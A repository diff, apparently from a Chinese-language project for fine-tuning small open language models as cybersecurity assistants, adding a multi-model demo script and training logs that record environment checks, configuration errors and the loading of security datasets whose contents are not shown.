+        # 加载模型
+        inference.load_model(model_key=model_key)
+        print("模型加载成功")
+        
+        # 测试对话
+        test_message = "请介绍一下网络安全的基本概念"
+        response, history = inference.chat(test_message)
+        
+        print(f"用户: {test_message}")
+        print(f"助手: {response}")
+        
+        return True
+        
+    except Exception as e:
+        print(f"模型 {model_key} 测试失败: {e}")
+        return False
+
+def compare_models():
+    """比较不同模型的回复"""
+    print("\n=== 模型回复比较 ===")
+    
+    test_question = "什么是SQL注入攻击?如何防护?"
+    print(f"测试问题: {test_question}\n")
+    
+    registry = ModelRegistry()
+    models = registry.list_models()
+    
+    for model_key in models.keys():
+        print(f"--- {model_key} ---")
+        try:
+            config = Config()
+            inference = SecurityModelInference(config, model_key=model_key)
+            
+            # 检查模型是否存在
+            model_path = Path(config.get_model_path())
+            if not model_path.exists():
+                print(f"模型未下载,跳过: {model_path}")
+                continue
+            
+            inference.load_model(model_key=model_key)
+            response, _ = inference.chat(test_question)
+            
+            print(f"回复: {response[:200]}..." if len(response) > 200 else f"回复: {response}")
+            
+        except Exception as e:
+            print(f"错误: {e}")
+        
+        print()
+
+def switch_model_demo():
+    """演示模型切换功能"""
+    print("\n=== 模型切换演示 ===")
+    
+    config = Config()
+    
+    # 显示当前模型
+    current_model = config.get_current_model_key()
+    print(f"当前模型: {current_model}")
+    
+    # 切换到不同的模型
+    registry = ModelRegistry()
+    models = list(registry.list_models().keys())
+    
+    for model_key in models[:3]:  # 只测试前3个模型
+        print(f"\n切换到模型: {model_key}")
+        config.set_current_model(model_key)
+        
+        current_config = config.get_current_model_config()
+        print(f"模型名称: {current_config.name}")
+        print(f"模型架构: {current_config.architecture}")
+        print(f"本地路径: {config.get_model_path()}")
+
+def download_model_demo(model_key: str):
+    """演示模型下载功能"""
+    print(f"\n=== 下载模型演示: {model_key} ===")
+    
+    try:
+        config = Config()
+        downloader = ModelDownloader(config, model_key=model_key)
+        
+        # 获取下载信息
+        modelscope_id = config.get_model_id_for_download('modelscope')
+        huggingface_id = config.get_model_id_for_download('huggingface')
+        
+        print(f"ModelScope ID: {modelscope_id}")
+        print(f"HuggingFace ID: {huggingface_id}")
+        print(f"本地路径: {config.get_model_path()}")
+        
+        # 检查是否已下载
+        model_path = Path(config.get_model_path())
+        if model_path.exists() and any(model_path.iterdir()):
+            print("模型已存在")
+        else:
+            print("模型需要下载")
+            # 注意:实际下载可能需要很长时间,这里只是演示
+            # model_path = downloader.ensure_model_downloaded()
+            # print(f"下载完成: {model_path}")
+        
+    except Exception as e:
+        print(f"下载演示失败: {e}")
+
+def main():
+    """主函数"""
+    print("神机多模型支持演示")
+    print("=" * 50)
+    
+    # 1. 列出可用模型
+    list_available_models()
+    
+    # 2. 演示模型切换
+    switch_model_demo()
+    
+    # 3. 演示下载功能
+    download_model_demo('qwen2.5-1.5b')
+    download_model_demo('chatglm3-6b')
+    
+    # 4. 测试模型推理(如果模型已下载)
+    registry = ModelRegistry()
+    for model_key in list(registry.list_models().keys())[:2]:  # 只测试前2个
+        config = Config()
+        config.set_current_model(model_key)
+        model_path = Path(config.get_model_path())
+        
+        if model_path.exists() and any(model_path.iterdir()):
+            test_model_inference(model_key)
+        else:
+            print(f"\n模型 {model_key} 未下载,跳过推理测试")
+    
+    # 5. 比较模型回复(如果有多个模型已下载)
+    # compare_models()
+    
+    print("\n演示完成!")
+
+if __name__ == "__main__":
+    main()

La diferencia del archivo ha sido suprimido porque es demasiado grande
+ 5 - 0
examples/sample_data.json


+ 24 - 0
logs/training_20250717_215036.log

@@ -0,0 +1,24 @@
+2025-07-17 21:50:36 - root - INFO - 日志系统已初始化,日志文件: /qwen/logs/training_20250717_215036.log
+2025-07-17 21:50:36 - TrainingMonitor - INFO - 训练监控器已初始化,监控间隔: 30秒
+2025-07-17 21:50:36 - SecurityModelApp - INFO - 网络安全模型应用程序已初始化
+2025-07-17 21:50:36 - SecurityModelApp - INFO - 开始完整训练流程...
+2025-07-17 21:50:36 - SecurityModelApp - INFO - 开始环境检查...
+2025-07-17 21:50:36 - EnvironmentChecker - INFO - 开始环境检查...
+2025-07-17 21:50:36 - EnvironmentChecker - INFO - ✓ python_version: Python 3.10.12
+2025-07-17 21:50:36 - EnvironmentChecker - INFO - ✓ cuda_availability: CUDA 12.6, 1 GPU(s), NVIDIA P106-100
+2025-07-17 21:50:36 - EnvironmentChecker - INFO - ✓ gpu_memory: 总内存: 5.9GB, 可用: 5.9GB
+2025-07-17 21:50:36 - EnvironmentChecker - INFO - ✓ disk_space: 总空间: 441.4GB, 可用: 380.4GB
+2025-07-17 21:50:36 - EnvironmentChecker - INFO - ✓ system_memory: 总内存: 15.6GB, 可用: 9.2GB
+2025-07-17 21:50:36 - EnvironmentChecker - INFO - ✓ required_packages: 已安装: 8/8
+2025-07-17 21:50:47 - EnvironmentChecker - INFO - ✓ network_connectivity: HuggingFace: ✗, ModelScope: ✓
+2025-07-17 21:50:47 - EnvironmentChecker - INFO - ✓ directory_permissions: 所有目录可写
+2025-07-17 21:50:47 - EnvironmentChecker - INFO - 
+环境检查完成: 8/8 项通过
+2025-07-17 21:50:47 - EnvironmentChecker - INFO - ✓ 环境检查全部通过,可以开始训练
+2025-07-17 21:50:47 - SecurityModelApp - INFO - 开始数据准备...
+2025-07-17 21:50:47 - SecurityModelApp - INFO - 发现已处理的数据,跳过数据下载和处理
+2025-07-17 21:50:47 - SecurityModelApp - INFO - 开始模型训练...
+2025-07-17 21:50:47 - TrainingMonitor - INFO - 开始训练监控
+2025-07-17 21:50:47 - SecurityModelApp - INFO - 设置模型...
+2025-07-17 21:50:47 - ModelDownloader - INFO - 开始下载模型: Qwen/Qwen2.5-1.5B-Instruct
+2025-07-17 21:50:47 - ModelDownloader - INFO - 使用git clone从ModelScope下载: https://www.modelscope.cn/qwen/Qwen2.5-1.5B-Instruct.git

+ 10 - 0
logs/training_20250717_234946.log

@@ -0,0 +1,10 @@
+/qwen/venv/lib/python3.10/site-packages/transformers/utils/hub.py:111: FutureWarning: Using `TRANSFORMERS_CACHE` is deprecated and will be removed in v5 of Transformers. Use `HF_HOME` instead.
+  warnings.warn(
+2025-07-17 23:49:51 - root - INFO - 日志系统已初始化,日志文件: /qwen/logs/training_20250717_234951.log
+2025-07-17 23:49:51 - TrainingMonitor - INFO - 训练监控器已初始化,监控间隔: 30秒
+2025-07-17 23:49:51 - SecurityModelApp - INFO - 网络安全模型应用程序已初始化
+2025-07-17 23:49:51 - SecurityModelApp - INFO - 开始新的模型训练...
+2025-07-17 23:49:51 - TrainingMonitor - INFO - 开始训练监控
+2025-07-17 23:49:51 - SecurityModelApp - INFO - 设置模型...
+2025-07-17 23:49:51 - SecurityModelApp - ERROR - 模型训练失败: 不支持的模型: qwen/Qwen2.5-1.5B-Instruct。支持的模型: ['qwen2.5-1.5b-instruct', 'qwen2-1.5b-instruct', 'qwen2-7b-instruct', 'chatglm3-6b', 'baichuan2-7b-chat', 'llama2-7b-chat']
+2025-07-17 23:49:51 - TrainingMonitor - INFO - 训练监控结束,总时长: 0:00:00.000295

+ 8 - 0
logs/training_20250717_234951.log

@@ -0,0 +1,8 @@
+2025-07-17 23:49:51 - root - INFO - 日志系统已初始化,日志文件: /qwen/logs/training_20250717_234951.log
+2025-07-17 23:49:51 - TrainingMonitor - INFO - 训练监控器已初始化,监控间隔: 30秒
+2025-07-17 23:49:51 - SecurityModelApp - INFO - 网络安全模型应用程序已初始化
+2025-07-17 23:49:51 - SecurityModelApp - INFO - 开始新的模型训练...
+2025-07-17 23:49:51 - TrainingMonitor - INFO - 开始训练监控
+2025-07-17 23:49:51 - SecurityModelApp - INFO - 设置模型...
+2025-07-17 23:49:51 - SecurityModelApp - ERROR - 模型训练失败: 不支持的模型: qwen/Qwen2.5-1.5B-Instruct。支持的模型: ['qwen2.5-1.5b-instruct', 'qwen2-1.5b-instruct', 'qwen2-7b-instruct', 'chatglm3-6b', 'baichuan2-7b-chat', 'llama2-7b-chat']
+2025-07-17 23:49:51 - TrainingMonitor - INFO - 训练监控结束,总时长: 0:00:00.000295

+ 26 - 0
logs/training_20250717_235406.log

@@ -0,0 +1,26 @@
+/qwen/venv/lib/python3.10/site-packages/transformers/utils/hub.py:111: FutureWarning: Using `TRANSFORMERS_CACHE` is deprecated and will be removed in v5 of Transformers. Use `HF_HOME` instead.
+  warnings.warn(
+2025-07-17 23:54:34 - root - INFO - 日志系统已初始化,日志文件: /qwen/logs/training_20250717_235434.log
+2025-07-17 23:54:34 - TrainingMonitor - INFO - 训练监控器已初始化,监控间隔: 30秒
+2025-07-17 23:54:34 - SecurityModelApp - INFO - 网络安全模型应用程序已初始化
+2025-07-17 23:54:34 - SecurityModelApp - INFO - 开始完整训练流程...
+2025-07-17 23:54:34 - SecurityModelApp - INFO - 开始环境检查...
+2025-07-17 23:54:34 - EnvironmentChecker - INFO - 开始环境检查...
+2025-07-17 23:54:34 - EnvironmentChecker - INFO - ✓ python_version: Python 3.10.12
+2025-07-17 23:54:34 - EnvironmentChecker - INFO - ✓ cuda_availability: CUDA 12.6, 1 GPU(s), NVIDIA P106-100
+2025-07-17 23:54:34 - EnvironmentChecker - INFO - ✓ gpu_memory: 总内存: 5.9GB, 可用: 5.9GB
+2025-07-17 23:54:34 - EnvironmentChecker - INFO - ✓ disk_space: 总空间: 441.4GB, 可用: 380.6GB
+2025-07-17 23:54:34 - EnvironmentChecker - INFO - ✓ system_memory: 总内存: 15.6GB, 可用: 14.3GB
+2025-07-17 23:54:34 - EnvironmentChecker - INFO - ✓ required_packages: 已安装: 8/8
+2025-07-17 23:54:45 - EnvironmentChecker - INFO - ✓ network_connectivity: HuggingFace: ✗, ModelScope: ✓
+2025-07-17 23:54:45 - EnvironmentChecker - INFO - ✓ directory_permissions: 所有目录可写
+2025-07-17 23:54:45 - EnvironmentChecker - INFO - 
+环境检查完成: 8/8 项通过
+2025-07-17 23:54:45 - EnvironmentChecker - INFO - ✓ 环境检查全部通过,可以开始训练
+2025-07-17 23:54:45 - SecurityModelApp - INFO - 开始数据准备...
+2025-07-17 23:54:45 - SecurityModelApp - INFO - 发现已处理的数据,跳过数据下载和处理
+2025-07-17 23:54:45 - SecurityModelApp - INFO - 开始新的模型训练...
+2025-07-17 23:54:45 - TrainingMonitor - INFO - 开始训练监控
+2025-07-17 23:54:45 - SecurityModelApp - INFO - 设置模型...
+2025-07-17 23:54:45 - SecurityModelApp - ERROR - 模型训练失败: 不支持的模型: qwen/Qwen2.5-1.5B-Instruct。支持的模型: ['qwen2.5-1.5b-instruct', 'qwen2-1.5b-instruct', 'qwen2-7b-instruct', 'chatglm3-6b', 'baichuan2-7b-chat', 'llama2-7b-chat']
+2025-07-17 23:54:45 - TrainingMonitor - INFO - 训练监控结束,总时长: 0:00:00.000330

+ 24 - 0
logs/training_20250717_235434.log

@@ -0,0 +1,24 @@
+2025-07-17 23:54:34 - root - INFO - 日志系统已初始化,日志文件: /qwen/logs/training_20250717_235434.log
+2025-07-17 23:54:34 - TrainingMonitor - INFO - 训练监控器已初始化,监控间隔: 30秒
+2025-07-17 23:54:34 - SecurityModelApp - INFO - 网络安全模型应用程序已初始化
+2025-07-17 23:54:34 - SecurityModelApp - INFO - 开始完整训练流程...
+2025-07-17 23:54:34 - SecurityModelApp - INFO - 开始环境检查...
+2025-07-17 23:54:34 - EnvironmentChecker - INFO - 开始环境检查...
+2025-07-17 23:54:34 - EnvironmentChecker - INFO - ✓ python_version: Python 3.10.12
+2025-07-17 23:54:34 - EnvironmentChecker - INFO - ✓ cuda_availability: CUDA 12.6, 1 GPU(s), NVIDIA P106-100
+2025-07-17 23:54:34 - EnvironmentChecker - INFO - ✓ gpu_memory: 总内存: 5.9GB, 可用: 5.9GB
+2025-07-17 23:54:34 - EnvironmentChecker - INFO - ✓ disk_space: 总空间: 441.4GB, 可用: 380.6GB
+2025-07-17 23:54:34 - EnvironmentChecker - INFO - ✓ system_memory: 总内存: 15.6GB, 可用: 14.3GB
+2025-07-17 23:54:34 - EnvironmentChecker - INFO - ✓ required_packages: 已安装: 8/8
+2025-07-17 23:54:45 - EnvironmentChecker - INFO - ✓ network_connectivity: HuggingFace: ✗, ModelScope: ✓
+2025-07-17 23:54:45 - EnvironmentChecker - INFO - ✓ directory_permissions: 所有目录可写
+2025-07-17 23:54:45 - EnvironmentChecker - INFO - 
+环境检查完成: 8/8 项通过
+2025-07-17 23:54:45 - EnvironmentChecker - INFO - ✓ 环境检查全部通过,可以开始训练
+2025-07-17 23:54:45 - SecurityModelApp - INFO - 开始数据准备...
+2025-07-17 23:54:45 - SecurityModelApp - INFO - 发现已处理的数据,跳过数据下载和处理
+2025-07-17 23:54:45 - SecurityModelApp - INFO - 开始新的模型训练...
+2025-07-17 23:54:45 - TrainingMonitor - INFO - 开始训练监控
+2025-07-17 23:54:45 - SecurityModelApp - INFO - 设置模型...
+2025-07-17 23:54:45 - SecurityModelApp - ERROR - 模型训练失败: 不支持的模型: qwen/Qwen2.5-1.5B-Instruct。支持的模型: ['qwen2.5-1.5b-instruct', 'qwen2-1.5b-instruct', 'qwen2-7b-instruct', 'chatglm3-6b', 'baichuan2-7b-chat', 'llama2-7b-chat']
+2025-07-17 23:54:45 - TrainingMonitor - INFO - 训练监控结束,总时长: 0:00:00.000330

+ 17 - 0
logs/training_20250717_235957.log

@@ -0,0 +1,17 @@
+2025-07-17 23:59:57 - root - INFO - 日志系统已初始化,日志文件: /qwen/logs/training_20250717_235957.log
+2025-07-17 23:59:57 - TrainingMonitor - INFO - 训练监控器已初始化,监控间隔: 30秒
+2025-07-17 23:59:57 - SecurityModelApp - INFO - 网络安全模型应用程序已初始化
+2025-07-17 23:59:57 - SecurityModelApp - INFO - 开始新的模型训练...
+2025-07-17 23:59:57 - TrainingMonitor - INFO - 开始训练监控
+2025-07-17 23:59:57 - SecurityModelApp - INFO - 设置模型...
+2025-07-17 23:59:57 - ModelDownloader - INFO - 开始下载模型: qwen2.5-1.5b-instruct
+2025-07-17 23:59:57 - ModelDownloader - WARNING - Git下载失败: Config.get_model_id_for_download() takes from 1 to 2 positional arguments but 3 were given,尝试SDK方式
+2025-07-17 23:59:57 - ModelDownloader - ERROR - SDK下载也失败: Config.get_model_id_for_download() takes from 1 to 2 positional arguments but 3 were given
+2025-07-17 23:59:57 - ModelDownloader - ERROR - 模型下载失败: Config.get_model_id_for_download() takes from 1 to 2 positional arguments but 3 were given
+2025-07-17 23:59:57 - ModelDownloader - INFO - 尝试从HuggingFace下载...
+2025-07-17 23:59:57 - ModelDownloader - INFO - 从HuggingFace下载: qwen2.5-1.5b-instruct
+2025-07-18 00:00:17 - ModelDownloader - ERROR - HuggingFace下载失败: We couldn't connect to 'https://huggingface.co' to load the files, and couldn't find them in the cached files.
+Check your internet connection or see how to run the library in offline mode at 'https://huggingface.co/docs/transformers/installation#offline-mode'.
+2025-07-18 00:00:17 - SecurityModelApp - ERROR - 模型训练失败: We couldn't connect to 'https://huggingface.co' to load the files, and couldn't find them in the cached files.
+Check your internet connection or see how to run the library in offline mode at 'https://huggingface.co/docs/transformers/installation#offline-mode'.
+2025-07-18 00:00:17 - TrainingMonitor - INFO - 训练监控结束,总时长: 0:00:20.072524

+ 12 - 0
logs/training_20250718_000101.log

@@ -0,0 +1,12 @@
+2025-07-18 00:01:01 - root - INFO - 日志系统已初始化,日志文件: /qwen/logs/training_20250718_000101.log
+2025-07-18 00:01:01 - TrainingMonitor - INFO - 训练监控器已初始化,监控间隔: 30秒
+2025-07-18 00:01:01 - SecurityModelApp - INFO - 网络安全模型应用程序已初始化
+2025-07-18 00:01:01 - SecurityModelApp - INFO - 开始新的模型训练...
+2025-07-18 00:01:01 - TrainingMonitor - INFO - 开始训练监控
+2025-07-18 00:01:01 - SecurityModelApp - INFO - 设置模型...
+2025-07-18 00:01:01 - ModelDownloader - INFO - 开始下载模型: qwen2.5-1.5b-instruct
+2025-07-18 00:01:01 - ModelDownloader - INFO - 使用git clone从ModelScope下载: https://www.modelscope.cn/qwen/Qwen2.5-1.5B-Instruct.git
+2025-07-18 00:06:20 - ModelDownloader - INFO - Git clone成功: /qwen/models/Qwen_Qwen2.5-1.5B-Instruct
+2025-07-18 00:06:21 - SecurityModelTrainer - INFO - 加载模型: /qwen/models/Qwen_Qwen2.5-1.5B-Instruct
+2025-07-18 00:06:23 - SecurityModelApp - ERROR - 模型训练失败: 'ModelConfig' object has no attribute 'supports_quantization'
+2025-07-18 00:06:23 - TrainingMonitor - INFO - 训练监控结束,总时长: 0:05:22.527132

+ 62 - 0
logs/training_20250718_000815.log

@@ -0,0 +1,62 @@
+2025-07-18 00:08:15 - root - INFO - 日志系统已初始化,日志文件: /qwen/logs/training_20250718_000815.log
+2025-07-18 00:08:15 - TrainingMonitor - INFO - 训练监控器已初始化,监控间隔: 30秒
+2025-07-18 00:08:15 - SecurityModelApp - INFO - 网络安全模型应用程序已初始化
+2025-07-18 00:08:15 - SecurityModelApp - INFO - 开始新的模型训练...
+2025-07-18 00:08:15 - TrainingMonitor - INFO - 开始训练监控
+2025-07-18 00:08:15 - SecurityModelApp - INFO - 设置模型...
+2025-07-18 00:08:15 - ModelDownloader - INFO - 模型已存在: /qwen/models/Qwen_Qwen2.5-1.5B-Instruct
+2025-07-18 00:08:15 - SecurityModelTrainer - INFO - 加载模型: /qwen/models/Qwen_Qwen2.5-1.5B-Instruct
+2025-07-18 00:08:17 - accelerate.utils.modeling - INFO - We will use 90% of the memory on device 0 for storing the model, and 10% for the buffer to avoid OOM. You can set `max_memory` in to a higher value to use more memory (at your own risk).
+2025-07-18 00:08:21 - SecurityModelTrainer - INFO - 模型已加载并配置8位量化
+2025-07-18 00:08:22 - SecurityModelTrainer - INFO - LoRA配置已应用
+2025-07-18 00:08:22 - SecurityModelTrainer - INFO - 模型设置完成
+2025-07-18 00:08:22 - SecurityModelApp - INFO - 准备训练数据...
+2025-07-18 00:08:22 - DataLoader - INFO - 未指定数据文件,将自动加载目录下所有JSON文件
+2025-07-18 00:08:22 - DataLoader - INFO - 发现 5 个JSON文件和 14 个JSONL文件
+2025-07-18 00:08:22 - DataLoader - INFO - 正在加载JSON文件: additional_data.json
+2025-07-18 00:08:22 - DataLoader - INFO - 从 additional_data.json 加载了 2 条数据
+2025-07-18 00:08:22 - DataLoader - INFO - 正在加载JSON文件: enhanced_test.json
+2025-07-18 00:08:22 - DataLoader - INFO - 从 enhanced_test.json 加载了 6 条数据
+2025-07-18 00:08:22 - DataLoader - INFO - 正在加载JSON文件: cleaned_data.json
+2025-07-18 00:08:22 - DataLoader - INFO - 从 cleaned_data.json 加载了 12 条数据
+2025-07-18 00:08:22 - DataLoader - INFO - 正在加载JSON文件: training_data.json
+2025-07-18 00:08:22 - DataLoader - INFO - 从 training_data.json 加载了 12 条数据
+2025-07-18 00:08:22 - DataLoader - INFO - 正在加载JSON文件: test_data.json
+2025-07-18 00:08:22 - DataLoader - INFO - 从 test_data.json 加载了 2 条数据
+2025-07-18 00:08:22 - DataLoader - INFO - 正在加载JSONL文件: dedup_modelscope_dataset_sample.jsonl
+2025-07-18 00:08:22 - DataLoader - INFO - 从 dedup_modelscope_dataset_sample.jsonl 加载了 100 条数据
+2025-07-18 00:08:22 - DataLoader - INFO - 正在加载JSONL文件: security_only_training_dataset.jsonl
+2025-07-18 00:08:22 - DataLoader - INFO - 从 security_only_training_dataset.jsonl 加载了 14322 条数据
+2025-07-18 00:08:22 - DataLoader - INFO - 正在加载JSONL文件: dedup_alpaca_with_cot.jsonl
+2025-07-18 00:08:22 - DataLoader - INFO - 从 dedup_alpaca_with_cot.jsonl 加载了 2951 条数据
+2025-07-18 00:08:22 - DataLoader - INFO - 正在加载JSONL文件: dedup_poc_security_training.jsonl
+2025-07-18 00:08:22 - DataLoader - INFO - 从 dedup_poc_security_training.jsonl 加载了 1131 条数据
+2025-07-18 00:08:22 - DataLoader - INFO - 正在加载JSONL文件: webshell_dataset_sample.jsonl
+2025-07-18 00:08:22 - DataLoader - INFO - 从 webshell_dataset_sample.jsonl 加载了 10 条数据
+2025-07-18 00:08:22 - DataLoader - INFO - 正在加载JSONL文件: dedup_modelscope_security_training.jsonl
+2025-07-18 00:08:23 - DataLoader - INFO - 从 dedup_modelscope_security_training.jsonl 加载了 11044 条数据
+2025-07-18 00:08:23 - DataLoader - INFO - 正在加载JSONL文件: dedup_eval_data.jsonl
+2025-07-18 00:08:23 - DataLoader - INFO - 从 dedup_eval_data.jsonl 加载了 478 条数据
+2025-07-18 00:08:23 - DataLoader - INFO - 正在加载JSONL文件: dedup_hf_dataset_sample.jsonl
+2025-07-18 00:08:23 - DataLoader - INFO - 从 dedup_hf_dataset_sample.jsonl 加载了 100 条数据
+2025-07-18 00:08:23 - DataLoader - INFO - 正在加载JSONL文件: final_security_training_dataset.jsonl
+2025-07-18 00:08:24 - DataLoader - INFO - 从 final_security_training_dataset.jsonl 加载了 21653 条数据
+2025-07-18 00:08:24 - DataLoader - INFO - 正在加载JSONL文件: enhanced_test.jsonl
+2025-07-18 00:08:24 - DataLoader - INFO - 从 enhanced_test.jsonl 加载了 2 条数据
+2025-07-18 00:08:24 - DataLoader - INFO - 正在加载JSONL文件: dedup_cve_dataset_sample.jsonl
+2025-07-18 00:08:24 - DataLoader - INFO - 从 dedup_cve_dataset_sample.jsonl 加载了 100 条数据
+2025-07-18 00:08:24 - DataLoader - INFO - 正在加载JSONL文件: dedup_train_data.jsonl
+2025-07-18 00:08:24 - DataLoader - INFO - 从 dedup_train_data.jsonl 加载了 4380 条数据
+2025-07-18 00:08:24 - DataLoader - INFO - 正在加载JSONL文件: webshell_security_training.jsonl
+2025-07-18 00:08:24 - DataLoader - INFO - 从 webshell_security_training.jsonl 加载了 1480 条数据
+2025-07-18 00:08:24 - DataLoader - INFO - 正在加载JSONL文件: dedup_cve_security_training.jsonl
+2025-07-18 00:08:24 - DataLoader - INFO - 从 dedup_cve_security_training.jsonl 加载了 667 条数据
+2025-07-18 00:08:24 - DataLoader - INFO - 总共加载了 58452 条训练数据
+2025-07-18 00:08:24 - DataLoader - INFO - 已加载的文件: additional_data.json (2条), enhanced_test.json (6条), cleaned_data.json (12条), training_data.json (12条), test_data.json (2条), dedup_modelscope_dataset_sample.jsonl (100条), security_only_training_dataset.jsonl (14322条), dedup_alpaca_with_cot.jsonl (2951条), dedup_poc_security_training.jsonl (1131条), webshell_dataset_sample.jsonl (10条), dedup_modelscope_security_training.jsonl (11044条), dedup_eval_data.jsonl (478条), dedup_hf_dataset_sample.jsonl (100条), final_security_training_dataset.jsonl (21653条), enhanced_test.jsonl (2条), dedup_cve_dataset_sample.jsonl (100条), dedup_train_data.jsonl (4380条), webshell_security_training.jsonl (1480条), dedup_cve_security_training.jsonl (667条)
+2025-07-18 00:08:24 - DataLoader - INFO - 数据分割: 训练集 52606 条,验证集 5846 条
+2025-07-18 00:08:24 - DataLoader - INFO - 创建数据集: 52606 个样本
+2025-07-18 00:08:24 - DataLoader - INFO - 创建数据集: 5846 个样本
+2025-07-18 00:08:24 - SecurityModelTrainer - INFO - 训练准备完成
+2025-07-18 00:08:24 - SecurityModelApp - INFO - 训练配置: {'model_loaded': True, 'tokenizer_loaded': True, 'trainer_ready': True, 'config': {'base_model': 'qwen/Qwen2.5-1.5B-Instruct', 'use_lora': True, 'fp16': True, 'batch_size': 1, 'learning_rate': 0.0002, 'num_epochs': 3}, 'train_dataset_size': 52606, 'eval_dataset_size': 5846}
+2025-07-18 00:08:24 - SecurityModelApp - INFO - 开始训练...
+2025-07-18 00:08:24 - SecurityModelTrainer - INFO - 开始模型训练...

+ 16 - 0
logs/training_20250718_005529.log

@@ -0,0 +1,16 @@
+2025-07-18 00:55:29 - root - INFO - 日志系统已初始化,日志文件: /qwen/logs/training_20250718_005529.log
+2025-07-18 00:55:29 - TrainingMonitor - INFO - 训练监控器已初始化,监控间隔: 30秒
+2025-07-18 00:55:29 - SecurityModelApp - INFO - 网络安全模型应用程序已初始化
+2025-07-18 00:55:29 - SecurityModelApp - INFO - 开始环境检查...
+2025-07-18 00:55:29 - EnvironmentChecker - INFO - 开始环境检查...
+2025-07-18 00:55:29 - EnvironmentChecker - INFO - ✓ python_version: Python 3.10.12
+2025-07-18 00:55:29 - EnvironmentChecker - INFO - ✓ cuda_availability: CUDA 12.6, 1 GPU(s), NVIDIA P106-100
+2025-07-18 00:55:29 - EnvironmentChecker - INFO - ✓ gpu_memory: 总内存: 5.9GB, 可用: 5.9GB
+2025-07-18 00:55:29 - EnvironmentChecker - INFO - ✓ disk_space: 总空间: 441.4GB, 可用: 377.7GB
+2025-07-18 00:55:29 - EnvironmentChecker - INFO - ✓ system_memory: 总内存: 15.6GB, 可用: 9.7GB
+2025-07-18 00:55:29 - EnvironmentChecker - INFO - ✓ required_packages: 已安装: 8/8
+2025-07-18 00:55:39 - EnvironmentChecker - INFO - ✓ network_connectivity: HuggingFace: ✗, ModelScope: ✓
+2025-07-18 00:55:39 - EnvironmentChecker - INFO - ✓ directory_permissions: 所有目录可写
+2025-07-18 00:55:39 - EnvironmentChecker - INFO - 
+环境检查完成: 8/8 项通过
+2025-07-18 00:55:39 - EnvironmentChecker - INFO - ✓ 环境检查全部通过,可以开始训练

+ 18 - 0
logs/training_20250718_005809.log

@@ -0,0 +1,18 @@
+/qwen/venv/lib/python3.10/site-packages/transformers/utils/hub.py:111: FutureWarning: Using `TRANSFORMERS_CACHE` is deprecated and will be removed in v5 of Transformers. Use `HF_HOME` instead.
+  warnings.warn(
+2025-07-18 00:58:14 - root - INFO - 日志系统已初始化,日志文件: /qwen/logs/training_20250718_005814.log
+2025-07-18 00:58:14 - TrainingMonitor - INFO - 训练监控器已初始化,监控间隔: 30秒
+2025-07-18 00:58:14 - SecurityModelApp - INFO - 网络安全模型应用程序已初始化
+
+=== 模型选择 ===
+可用的模型:
+  1. qwen2.5-1.5b-instruct: Qwen2.5-1.5B-Instruct (qwen2)
+  2. qwen2-1.5b-instruct: Qwen2-1.5B-Instruct (qwen2)
+  3. qwen2-7b-instruct: Qwen2-7B-Instruct (qwen2)
+  4. chatglm3-6b: ChatGLM3-6B (chatglm)
+  5. baichuan2-7b-chat: Baichuan2-7B-Chat (baichuan)
+  6. llama2-7b-chat: Llama2-7B-Chat (llama)
+
+默认模型: Qwen2.5-1.5B-Instruct (qwen2.5-1.5b-instruct)
+请选择模型 (输入数字编号,或直接回车使用默认模型):
+> 

+ 3 - 0
logs/training_20250718_005814.log

@@ -0,0 +1,3 @@
+2025-07-18 00:58:14 - root - INFO - 日志系统已初始化,日志文件: /qwen/logs/training_20250718_005814.log
+2025-07-18 00:58:14 - TrainingMonitor - INFO - 训练监控器已初始化,监控间隔: 30秒
+2025-07-18 00:58:14 - SecurityModelApp - INFO - 网络安全模型应用程序已初始化

+ 31 - 0
logs/training_20250718_010752.log

@@ -0,0 +1,31 @@
+/qwen/venv/lib/python3.10/site-packages/transformers/utils/hub.py:111: FutureWarning: Using `TRANSFORMERS_CACHE` is deprecated and will be removed in v5 of Transformers. Use `HF_HOME` instead.
+  warnings.warn(
+2025-07-18 01:08:08 - root - INFO - 日志系统已初始化,日志文件: /qwen/logs/training_20250718_010808.log
+2025-07-18 01:08:08 - TrainingMonitor - INFO - 训练监控器已初始化,监控间隔: 30秒
+2025-07-18 01:08:08 - SecurityModelApp - INFO - 网络安全模型应用程序已初始化
+
+=== 模型选择 ===
+可用的模型:
+  1. qwen2.5-1.5b-instruct: Qwen2.5-1.5B-Instruct (qwen2)
+  2. qwen2-1.5b-instruct: Qwen2-1.5B-Instruct (qwen2)
+  3. qwen2-7b-instruct: Qwen2-7B-Instruct (qwen2)
+  4. chatglm3-6b: ChatGLM3-6B (chatglm)
+  5. baichuan2-7b-chat: Baichuan2-7B-Chat (baichuan)
+  6. llama2-7b-chat: Llama2-7B-Chat (llama)
+
+默认模型: Qwen2.5-1.5B-Instruct (qwen2.5-1.5b-instruct)
+请选择模型 (输入数字编号,或直接回车使用默认模型):
+> 已选择: qwen2.5-1.5b-instruct
+2025-07-18 01:08:08 - SecurityModelApp - INFO - 开始环境检查...
+2025-07-18 01:08:08 - EnvironmentChecker - INFO - 开始环境检查...
+2025-07-18 01:08:08 - EnvironmentChecker - INFO - ✓ python_version: Python 3.10.12
+2025-07-18 01:08:08 - EnvironmentChecker - INFO - ✓ cuda_availability: CUDA 12.6, 1 GPU(s), NVIDIA P106-100
+2025-07-18 01:08:08 - EnvironmentChecker - INFO - ✓ gpu_memory: 总内存: 5.9GB, 可用: 5.9GB
+2025-07-18 01:08:08 - EnvironmentChecker - INFO - ✓ disk_space: 总空间: 441.4GB, 可用: 377.7GB
+2025-07-18 01:08:08 - EnvironmentChecker - INFO - ✓ system_memory: 总内存: 15.6GB, 可用: 13.4GB
+2025-07-18 01:08:09 - EnvironmentChecker - INFO - ✓ required_packages: 已安装: 8/8
+2025-07-18 01:08:19 - EnvironmentChecker - INFO - ✓ network_connectivity: HuggingFace: ✗, ModelScope: ✓
+2025-07-18 01:08:19 - EnvironmentChecker - INFO - ✓ directory_permissions: 所有目录可写
+2025-07-18 01:08:19 - EnvironmentChecker - INFO - 
+环境检查完成: 8/8 项通过
+2025-07-18 01:08:19 - EnvironmentChecker - INFO - ✓ 环境检查全部通过,可以开始训练

+ 16 - 0
logs/training_20250718_010808.log

@@ -0,0 +1,16 @@
+2025-07-18 01:08:08 - root - INFO - 日志系统已初始化,日志文件: /qwen/logs/training_20250718_010808.log
+2025-07-18 01:08:08 - TrainingMonitor - INFO - 训练监控器已初始化,监控间隔: 30秒
+2025-07-18 01:08:08 - SecurityModelApp - INFO - 网络安全模型应用程序已初始化
+2025-07-18 01:08:08 - SecurityModelApp - INFO - 开始环境检查...
